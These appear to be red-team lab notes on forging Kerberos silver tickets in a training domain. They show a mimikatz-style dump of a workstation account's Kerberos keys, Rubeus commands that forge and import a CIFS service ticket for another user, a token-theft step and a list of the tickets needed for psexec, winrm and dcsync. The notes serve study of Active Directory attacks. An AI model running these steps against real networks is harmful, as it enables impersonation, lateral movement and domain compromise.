Silver Tickets

A "silver ticket" is a forged TGS, signed using the secret material (RC4/AES keys) of a computer account.

We dumped Kerberos keys from Workstation 1 from a SYSTEM Beacon

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WKSTN-1$
Domain            : DEV
Logon Server      : (null)
Logon Time        : 9/9/2022 9:37:22 AM
SID               : S-1-5-20

	 * Username : wkstn-1$
	 * Domain   : DEV.CYBERBOTIC.IO
	 * Password : (null)
	 * Key List :
	   aes256_hmac       c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7
	   rc4_hmac_nt       fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_old      fc0c8a61a83bafdffc587956d0020398
	   rc4_md4           fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_nt_exp   fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_old_exp  fc0c8a61a83bafdffc587956d0020398

Rubeus to forge a TGS for nlamb and the cifs service

Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

Import the ticket

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=

[+] ProcessID : 5668

steal_token 5668

Required Service Tickets

psexec - CIFS
winrm - HOST & HTTP
dcsync - LDAP

Last updated 2 years ago